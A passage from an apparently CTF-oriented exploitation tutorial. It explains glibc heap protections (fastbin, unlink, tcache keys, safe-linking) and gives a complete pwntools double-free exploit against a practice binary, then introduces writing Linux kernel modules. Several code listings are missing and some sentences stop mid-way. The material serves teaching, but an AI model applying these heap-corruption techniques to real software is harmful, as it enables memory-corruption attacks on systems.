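a, b = 0x1000, 0x1060  # hypothetical chunk addresses
direct = frees_accepted([a, a])          # first program
interleaved = frees_accepted([a, b, a])  # second program
```

Only the head is compared, so freeing a different chunk in between is enough to get the same chunk into the bin twice.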
When removing the chunk from a fastbin, make sure the size falls into the fastbin's
range
The previous protection could be bypassed by freeing another chunk in between the
double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd with something like 0x08041234 , you have to make sure
the metadata fits - i.e. the size ahead of the data is completely correct - and that makes
it harder, because you can't just write into the GOT, unless you get lucky.
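A rough model of that size check, assuming a 64-bit target (where the fastbin index is the size shifted right by 4, minus 2). Memory is a dict of 8-byte slots and all addresses and values are invented.

```python
def fastbin_index(size: int) -> int:
    """64-bit fastbin index for a chunk size."""
    return (size >> 4) - 2

def passes_size_check(mem: dict, chunk: int, bin_index: int) -> bool:
    """Would a chunk at this address be accepted when taken from this bin?"""
    size = mem.get(chunk + 8, 0) & ~0x7  # size field sits 8 bytes into the chunk
    return fastbin_index(size) == bin_index

FAKE_CHUNK = 0x602088  # hypothetical spot with a planted size field
GOT_ENTRY = 0x601018   # hypothetical GOT slot
mem = {
    FAKE_CHUNK + 8: 0x30,           # planted size matching the 0x30 bin
    GOT_ENTRY + 8: 0x7F1234567890,  # a neighbouring libc pointer, not a size
}

bin_for_0x30 = fastbin_index(0x30)
fake_ok = passes_size_check(mem, FAKE_CHUNK, bin_for_0x30)
got_ok = passes_size_check(mem, GOT_ENTRY, bin_for_0x30)
```

Pointing fd at arbitrary memory therefore only works if the 8 bytes that would be read as the size happen to map to the same bin.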
Double-Free Exploit
We're still on Xenial Xerus, which means both of the checks mentioned are still relevant.
The bypass for the second check (malloc() memory corruption) is given to you in the form
of fake metadata already set to a suitable size. Let's check the relevant parts of the source.
Analysis
Variables
The fakemetadata variable is the fake size of 0x30 , so you can focus on the double-
free itself rather than the protection bypass. Directly after this is the admin variable,
meaning if you pull the exploit off into the location of that fake metadata, you can just
overwrite that as proof.
users is a list of strings for the usernames, and userCount keeps track of the length
of the array.
main_loop()
void main_loop() {
    while(1) {
        printf(">> ");

        char input[2];
        read(0, input, sizeof(input));
        int choice = atoi(input);

        switch (choice)
        {
            case 1:
                createUser();
                break;
            case 2:
                deleteUser();
                break;
            case 3:
                complete_level();
            default:
                break;
        }
    }
}
Prompts for input, takes in input. Note that main() itself prints out the location of
fakemetadata , so we don't have to mess around with that at all.
createUser()
void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including
metadata, hence the fakemetadata being 0x30 ) then sets the array entry as a
deleteUser()
void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
Get index, print out the details and free() it. Easy peasy.
complete_level()
void complete_level() {
    if(strcmp(admin, "admin\n")) {
        puts("Level Complete!");
        return;
    }
}
Checks you overwrote admin with admin , if you did, mission accomplished!
Exploitation
There are literally no checks in place so we have a plethora of options available, but this
tutorial is about using a double-free, so we'll use that.
Setup
First let's make a skeleton of a script, along with some helper functions:
def create(name='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Name: ', name)

def delete(idx):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))

def complete():
    p.sendlineafter('>> ', '3')
    print(p.recvline())
As we know from the fasttop protection, we can't allocate once then free twice - we'll
have to free another chunk in between.
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
Let's check the progression of the fastbin by adding a pause() after every delete() .
We'll hook on with radare2 using
r2 -d $(pidof vuln)
delete(0) #1
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of
using dmhf 2 ( dmhf analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000 . Let's keep going.
delete(1)
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being
located at 0xd58030 .
delete(0) #2
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is
nice enough to point out there's a double-free.
Now we have a double-free, let's allocate Chunk 0 again and put some random data.
Because it's also considered free, the data we write is seen as being in the fd pointer
of the chunk. Remember, the heap saves space, so fd when free is located exactly
where data is when allocated (probably explained better here).
So let's write to fd , and see what happens to the fastbin. Remove all the pause()
instructions.
create(p64(0x08080808))
pause()
The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also
parse the fakemetadata location at the beginning of the exploit chain.
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
[...]
create('junk1')
create('junk2')
pause()
The reason we have to subtract 8 off fakemetadata is that the only thing we faked in
the source is the size field, but prev_size is at the very front of the chunk metadata.
If we point the fastbin freelist at the fakemetadata variable it'll interpret it as
prev_size and the 8 bytes afterwards as size , so we shift it all back 8 to align it
correctly.
Now we can control where we write, and we know where to write to.
First, let's replace the location we write to with where we want to:
create(p64(fake_metadata))
Now let's finish it off by creating another user. Since we control the fastbin, this user
gets written to the location of our fake metadata, giving us an almost arbitrary write.
create('\x00' * 8 + 'admin\x00')
complete()
The 8 null bytes are padding. If you read the source, you notice the metadata string is 16
bytes long rather than 8, so we need 8 more padding.
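The offsets involved are easy to get wrong, so here is the arithmetic spelled out as a sketch. The address of fakemetadata is illustrative; the layout assumed is the 64-bit one (8-byte prev_size, 8-byte size, then user data) with admin directly after the 16-byte fakemetadata variable.

```python
FAKEMETADATA = 0x602090  # illustrative address of the fakemetadata variable
FAKEMETADATA_LEN = 16    # the variable is 16 bytes long
ADMIN = FAKEMETADATA + FAKEMETADATA_LEN

chunk = FAKEMETADATA - 8   # what we put in fd
prev_size_at = chunk       # first 8 bytes of the fake chunk
size_at = chunk + 8        # lines up with the faked size value
user_data = chunk + 0x10   # where the next create() writes the name

padding_needed = ADMIN - user_data
name = b"\x00" * padding_needed + b"admin\x00"
```

Shifting the chunk back by 8 puts the faked size exactly where malloc looks for it, and the name then starts 8 bytes short of admin, hence the 8 null bytes.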
$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'
Final Exploit
from pwn import *

elf = context.binary = ELF('./vuln')  # assumes the binary is ./vuln
p = process()

def create(name='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Name: ', name)

def delete(idx):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))

def complete():
    p.sendlineafter('>> ', '3')
    print(p.recvline())

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success(f'Fake Metadata: {hex(fake_metadata)}')

create('yes')
create('yes')
delete(0)
delete(1)
delete(0)

create(p64(fake_metadata))
create('junk1')
create('junk2')

create('\x00' * 8 + 'admin\x00')
complete()
32-bit
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit
different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try
it yourself :)
Unlink Exploit
Overview
When a chunk is removed from a bin, unlink() is called on the chunk. The unlink
macro looks like this:
We want to write the value 0x10000000 to 0x5655578c . If we had the ability to create
a fake free chunk, we could choose the values for fd and bk . In this example, we
would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for
the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk
to 0x10000000 . Then when we unlink() this fake chunk, the process is as follows:
FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
FD->bk = BK (writes 0x10000000 to 0x56555780 + 0xc = 0x5655578c)
BK->fd = FD (writes 0x56555780 to 0x10000000 + 0x8 = 0x10000008)
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you
need to understand is P->fd just means 8 bytes off P and P->bk just means 12
bytes off P .
Then the fd and bk pointers point at the start of the chunk - prev_size . So when
overwriting the fd pointer here:
FD points to 0x56555780 , and then 0xc gets added on for bk , making the write
actually occur at 0x5655578c , which is what we wanted. That is why we fake fd and
bk values lower than the actual intended write location.
In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will
be 0x10 and 0x18 respectively.
The slight issue with the unlink exploit is that two writes happen, not one: bk gets
written to where you want (at fd plus the offset of bk ), but fd also gets written at
bk plus the offset of fd - and if either of these locations is not writable memory,
the binary will crash.
Protections
More modern libc versions have a different version of the unlink macro, which looks like
this:
FD = P->fd;
BK = P->bk;
Here unlink() checks the bk pointer of the forward chunk and the fd pointer of the
backward chunk and makes sure they both point to P , which is unlikely if you fake a chunk.
This quite significantly restricts where we can write using unlink.
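To see why the check hurts, here is a rough Python model of the hardened unlink. It is a sketch, not glibc's code: memory is a plain dictionary, the addresses `A`, `P` and `B` are hypothetical, and `safe_unlink()` and `try_unlink()` are names I made up. A genuine list passes, while the fake chunk with arbitrary `fd` and `bk` is rejected before anything is written.

```python
FD_OFFSET, BK_OFFSET = 0x8, 0xC  # 32-bit offsets of fd and bk inside a chunk


def safe_unlink(mem, p):
    """Toy model of the hardened unlink; mem maps address -> 32-bit word."""
    fd = mem.get(p + FD_OFFSET, 0)  # FD = P->fd
    bk = mem.get(p + BK_OFFSET, 0)  # BK = P->bk
    # Both neighbours must point back at P before anything is written.
    if mem.get(fd + BK_OFFSET, 0) != p or mem.get(bk + FD_OFFSET, 0) != p:
        raise RuntimeError("corrupted double-linked list")
    mem[fd + BK_OFFSET] = bk        # FD->bk = BK
    mem[bk + FD_OFFSET] = fd        # BK->fd = FD


def try_unlink(mem, p):
    """Return True if the unlink went through, False if the check fired."""
    try:
        safe_unlink(mem, p)
        return True
    except RuntimeError:
        return False


# Hypothetical addresses, chosen only for illustration.
A, P, B = 0x1000, 0x2000, 0x3000

# A genuine list: both neighbours of P point back at P.
genuine = {P + FD_OFFSET: A, P + BK_OFFSET: B, A + BK_OFFSET: P, B + FD_OFFSET: P}
print(try_unlink(genuine, P))

# A fake chunk with arbitrary fd and bk: nothing at fd + 0xc or bk + 0x8 points at P.
fake = {P + FD_OFFSET: 0x56555780, P + BK_OFFSET: 0x10000000}
print(try_unlink(fake, P))
```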
Tcache Keys
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in
the tcache_entry struct, the key :
/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
When a chunk is freed and tcache_put() is called on it, the key field is set to the
location of the tcache_perthread_struct . Why is this relevant? Let's check the tcache
security checks in _int_free() :
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
        /* Check to see if it's already in the tcache.  */
        tcache_entry *e = (tcache_entry *) chunk2mem (p);
The chunk being freed is variable e . We can see here that before tcache_put() is
called on it, there is a check being done:
The check determines whether the key field of the chunk e is set to the address of
the tcache_perthread_struct already. Remember that this happens when it is put
into the tcache with tcache_put() ! If the pointer is already there, there is a very
high chance that it's because the chunk has already been freed, in which case it's a
double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches
random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting.
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
  if (tmp == e)
    malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence.  We've wasted a
   few cycles, but don't abort.  */
The loop iterates through each entry in the bin, calls it tmp and compares it to e . If
they are equal, a double-free has been detected.
You can think of the key as an effectively random value (due to ASLR) that gets checked
against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it
stops a simple double-free, but if we have any kind of UAF primitive we can easily
overwrite e->key . Even with a single byte, we still have a 255/256 chance of
overwriting it to something that doesn't match key . Creating fake tcache chunks
doesn't matter either, as even in the latest glibc version there is no key check in
tcache_get() , meaning tcache poisoning is still doable.
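The whole mechanism is small enough to model in Python. This is a toy sketch under assumptions: one bin only, no count limit, and the `Chunk` and `Tcache` classes are invented for illustration. It shows a straight double-free being caught, and the same double-free going through once `key` has been overwritten (as a UAF would allow).

```python
class Chunk:
    """Stand-in for a tcache_entry: only next and key matter here."""

    def __init__(self, name):
        self.name = name
        self.next = None
        self.key = None


class Tcache:
    """Toy model of a single tcache bin with the key check."""

    def __init__(self):
        self.head = None

    def put(self, e):
        e.key = self            # e->key = tcache
        e.next = self.head      # e->next = tcache->entries[tc_idx]
        self.head = e

    def free(self, e):
        if e.key is self:       # key matches: possibly already in the tcache
            tmp = self.head
            while tmp is not None:
                if tmp is e:
                    raise RuntimeError("free(): double free detected in tcache 2")
                tmp = tmp.next
        self.put(e)


tc = Tcache()
a = Chunk("a")
tc.free(a)

try:
    tc.free(a)                  # straight double-free
    detected = False
except RuntimeError:
    detected = True
print(detected)

a.key = 0                       # pretend a UAF let us clobber e->key
tc.free(a)                      # the check is skipped, so the double-free works
print(a.next is a)              # the chunk now points at itself in the bin
```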
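In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is
mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if
we can read it, we get a heap leak, as the tcache_perthread_struct is stored on the heap.
In glibc 2.34, tcache_put() was changed to set key to a new variable, tcache_key ,
instead: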
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
What is tcache_key ? It's defined in malloc.c and set directly below, in the
tcache_key_initialize() function:
It attempts to call __getrandom() , which has both a stub definition and a Linux one;
the latter just uses a syscall to read n random bytes. If that fails for some reason, it
calls the random_bits() function instead.
This isn't a huge change - it's still only straight double-frees that are affected. We can
no longer leak the heap via the key , however.
Safe Linking
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect
the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd
pointer of free chunks in these bins with a mangling operation, making it more difficult
to overwrite it with an arbitrary value.
Here, pos is the location of the current chunk and ptr the location of the chunk we
are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are
using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR,
keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are
pretty predictable):
It's a very rudimentary protection - we use the current location and the location we
point to in order to mangle it. From a programming standpoint, it has virtually no
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in
PROTECT_PTR , and we can easily recreate it to fake our own mangled pointer.
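As a quick illustration, the mangling can be reproduced in Python. This is a sketch under assumptions: the heap addresses are made up, and `protect_ptr()` and `reveal_ptr()` are just Python stand-ins for the `PROTECT_PTR` and `REVEAL_PTR` macros. It shows that mangling is its own inverse, that the last chunk in a bin stores `pos >> 12` directly, and that knowing this value is enough to forge a pointer.

```python
def protect_ptr(pos, ptr):
    """PROTECT_PTR: XOR the pointer with the address it is stored at, shifted by 12."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos, mangled):
    """REVEAL_PTR: applying the same XOR again undoes the mangling."""
    return (pos >> 12) ^ mangled


# Hypothetical heap addresses, for illustration only.
chunk_fd_addr = 0x55555555B2A0   # where the fd pointer is stored (pos)
next_chunk = 0x55555555B2C0      # what fd points to (ptr)
target = 0x55555555B010          # 16-byte aligned address we want handed back

mangled = protect_ptr(chunk_fd_addr, next_chunk)
print(hex(mangled))
print(hex(reveal_ptr(chunk_fd_addr, mangled)))

# The last chunk in a bin has ptr == NULL, so its stored fd is just pos >> 12.
leak = protect_ptr(chunk_fd_addr, 0)
print(hex(leak))

# Knowing pos >> 12, we can forge a value that demangles to our target.
forged = leak ^ target
print(hex(reveal_ptr(chunk_fd_addr, forged)))
```

Note that `pos >> 12` is the same for every chunk on the same 0x1000-byte page, so one leak tends to go a long way.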
It might be tempting to say that a partial overwrite is still possible, but there is a new
security check that comes along with this Safe-Linking mechanism, the alignment
check. This check ensures that chunks are 16-byte aligned and is only relevant to singly-
linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in malloc.c will
bring up plenty of different locations. The most important ones for us as attackers are
probably the one in tcache_get() and the ones in _int_malloc() .
tcache_get
_int_malloc()
There are three checks here. First on REMOVE_FB , the macro for removing a chunk
from a fastbin:
And lastly on every fastbin chunk during the movement over to the respective
tcache bin:
_int_free()
malloc_consolidate()
When all the fastbins are consolidated into the unsorted bin, they are checked for
alignment:
Others
Not super important functions for attackers, but fastbin chunks are checked for
alignment in int_mallinfo() , __malloc_info() , do_check_malloc_state() ,
tcache_thread_shutdown() .
You may notice some of them use !aligned_OK while others use
misaligned_chunk() .
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)
The macros are defined side-by-side, but really aligned_OK is for addresses while
misaligned_chunk is for chunks.
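Both macros boil down to masking off the low bits of an address. Here is a small Python sketch of that idea, assuming the usual 64-bit value of 16 for `MALLOC_ALIGNMENT`; `aligned_ok()` is my own Python rendering, not the macro itself. The loop at the end counts how often a blindly chosen low nibble survives the check when the low nibble of the XOR key is unknown.

```python
MALLOC_ALIGNMENT = 0x10                    # assumed: 16 bytes, as on 64-bit glibc
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1   # 0xf, the low four bits


def aligned_ok(addr):
    """True when the low four bits of addr are all zero."""
    return (addr & MALLOC_ALIGN_MASK) == 0


print(aligned_ok(0x55555555B2A0))  # ends in 0, so it is aligned
print(aligned_ok(0x55555555B2A8))  # ends in 8, so it is not

# Blind overwrite: we write a fixed low nibble, but the demangled pointer is
# that nibble XORed with the unknown low nibble of pos >> 12.
guess = 0x7  # arbitrary nibble picked by the attacker
hits = sum(aligned_ok(guess ^ key_nibble) for key_nibble in range(16))
print(f"{hits}/16")
```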
This alignment check means you would have to guess 4 bits of entropy, leading to a
1/16 chance if you attempt to brute-force the last 4 bits to be
Kernel
Heavily beta
Introduction
The kernel is the program at the heart of the Operating System. It is responsible for
controlling every aspect of the computer, from the nature of syscalls to the integration
between software and hardware. As such, bugs in the kernel can lead to some
incredibly dangerous exploits.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of
kernel modules. This is an integral feature of Linux that allows users to extend the
kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow
here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most
kernel modules are compiled for a specific kernel version (which can be checked
with uname -r ; my Xenial Xerus is 4.15.0-128-generic ). We can load and unload
these modules using the insmod and rmmod commands respectively. Kernel modules
are often exposed under /dev/* or /proc/ . There are 3 main module types: Char, Block
and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of
bytes - just like a file - using syscalls such as open . In this way, they're virtually
dynamic files (at a super basic level), as the values read and written can be changed.
I'll be using the term module and device interchangeably. As far as I can tell, they are the
same, but please let me know if I'm wrong!
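To make the "just like a file" point concrete, here is a minimal Python sketch of reading from a device node with plain `open` and `read` syscalls. The helper name `read_device()` is my own, and the demo reads a temporary file so it runs anywhere; pointing it at a real device path is left as an assumption about your setup.

```python
import os
import tempfile


def read_device(path, length=32):
    """Open a path like any other file and read up to length bytes from it."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.read(fd, length)
    finally:
        os.close(fd)


# Stand-in for a device node: an ordinary temporary file with known contents.
with tempfile.NamedTemporaryFile(delete=False) as demo:
    demo.write(b"QWERTY")
    demo_path = demo.name

print(read_device(demo_path))
os.unlink(demo_path)
```

The userland code does not care whether the bytes come from a disk or from a handler inside a kernel module, which is the whole appeal of a Char Module.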
The Code
Writing a Char Module is surprisingly simple. First, we specify what happens on init
(loading of the module) and exit (unloading of the module). We need some special
headers for this.
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Mine!");
module_init(intro_init);
module_exit(intro_exit);
First we set the license, because otherwise we get a warning, and I hate warnings. Next
we tell the module what to do on load ( intro_init() ) and unload ( intro_exit() ).
Note we put the parameters as void ; this is because kernel modules are very picky about
requiring parameters (even if just void).
Note that we use printk rather than printf . glibc doesn't exist in kernel mode,
so instead we use the kernel's own printing function. KERN_ALERT specifies the type of
message sent, and there are many more types.
Compiling
Compiling a Kernel Object can seem a little more complex as we use a Makefile , but
it's surprisingly simple:
obj-m += intro.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
We use make to compile the module. The files produced are defined at the top as
obj-m . Note that compilation is unique per kernel, which is why the compiling process
uses the build directory of the kernel you are currently running.
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran
it, nor does it bother communicating with userspace. Instead, this code runs in the
kernel, and we can check the output using sudo dmesg .
Here we grab the last line using tail - as you can see, our printk is called!
You can view currently loaded modules using the lsmod command.
A major number is essentially the unique identifier to the kernel module. You can
specify it using the first parameter of register_chrdev , but if you pass 0 it is
automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite
understand what they do, but this code exposes the module to /dev/intro .
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
Controlling I/O
In intro_init , the first line may have been confusing:
The third parameter fops is where all the magic happens, allowing us to create
handlers for operations such as read and write . A really simple one would look
something like:
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line
up with the 2nd and 3rd parameters of the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a
parameter!
Full Code
If the module is successfully loaded, the read() call should read QWERTY into
buffer :
Success!
The Module
We're going to create a really basic authentication module that allows you to read the
flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it
can return us the flag. If not, it sends back FAIL: Not Authenticated! .
Interacting
Let's first try and interact with the kernel by reading from it.
Note that in the module source code, the length of read() is completely disregarded, so
we could make it any number at all! Try switching it to 1 and you'll see.
Epic! Let's write the correct password to the device then try again. It's really important
to send the null byte here! That's because copy_from_user() does not automatically
add it, so the strcmp will fail otherwise!
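The same write can be sketched from Python, which makes the explicit null byte easy to see. Everything here is an assumption for illustration: `authenticate()` is a made-up helper, the password is a placeholder rather than the real one, and the demo writes to a temporary file instead of the device so that it runs anywhere.

```python
import os
import tempfile


def authenticate(path, password):
    """Write the password plus an explicit NUL terminator; return bytes written."""
    payload = password + b"\x00"   # nothing appends the terminator for us
    fd = os.open(path, os.O_WRONLY)
    try:
        return os.write(fd, payload)
    finally:
        os.close(fd)


# Stand-in for the device node: an ordinary temporary file.
with tempfile.NamedTemporaryFile(delete=False) as demo:
    demo_path = demo.name

written = authenticate(demo_path, b"placeholder")  # hypothetical password
with open(demo_path, "rb") as f:
    print(written, f.read())
os.unlink(demo_path)
```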
It works!
The state is preserved between connections! Because the kernel module remains on,
you will be authenticated until the module is reloaded (either via rmmod then insmod ,
or a system restart).
Final Code
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead.
Then write a program to interact with it and perform the same operations. ZIP file
including both below, but no cheating! This is really good practice.
Double-Fetch
The most simple of vulnerabilities
Other